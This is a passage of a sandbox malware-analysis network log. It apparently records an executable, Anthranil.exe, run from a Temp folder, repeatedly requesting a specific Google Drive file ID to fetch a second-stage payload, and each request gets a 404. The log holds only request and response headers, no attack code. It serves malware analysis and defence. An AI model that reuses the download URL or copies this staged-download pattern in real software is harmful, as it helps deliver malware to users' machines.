                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 44 66 30 48 69 63 66 49 51 67 30 30 73 77 37 74 75 78 75 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vDf0HicfIQg00sw7tuxu0w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.449251216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:38 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:39 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:38 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-K05MBg2FieZGKti8bAYqLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.449260142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:39 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:40 UTC1851INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgQyxB9-iB40u7xrRo_i8LHwzV7razK3VC4IJhk7L9XqBSadW9jYGCJqeFUofnNPSDnqFQ-iMQM
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:40 GMT
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-tcqYqqwChqFINUHZo3dYOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:40 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 65 39 77 31 74 45 4d 70 44 70 62 43 55 72 4c 75 51 61 33 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Je9w1tEMpDpbCUrLuQa3GA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.449268216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:41 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:41 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:41 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: script-src 'nonce-FVcsj5t5GVe6q_OBNCUIGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.449276142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:42 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:42 UTC1844INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgT8zNwOpOZgE9eOuW7XP3yy5L6Y7NFcyKxKAd1nJKL_EmSex-Plm-rFbF1E2LQU9zeJ
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:42 GMT
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-JN5pSnM8jJiEbYm1SGdy6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 59 77 62 4c 31 54 4c 45 44 5a 4f 59 61 4b 78 6b 46 64 7a 46 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GYwbL1TLEDZOYaKxkFdzFw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.449283216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:43 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:43 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:43 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: script-src 'nonce-1LPXZ8N10u6pEpeNPQFr-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.449289142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:44 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:44 UTC1851INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgQ3yQOrHQMalSwG_0AIfhTxgG81HYZADqgy2dDO4AfOELtZVX21LHohl1INOqm5E3eE_RAy7eE
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:44 GMT
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-sCQUuUjZhEpY9O8Zx7PTeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:44 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 4e 2d 78 76 64 77 79 4d 4b 31 77 61 56 5f 62 77 49 61 71 55 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yN-xvdwyMK1waV_bwIaqUg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.449297216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:45 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:46 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:45 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-dG3tx_6FUzImPD2QOlkZLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
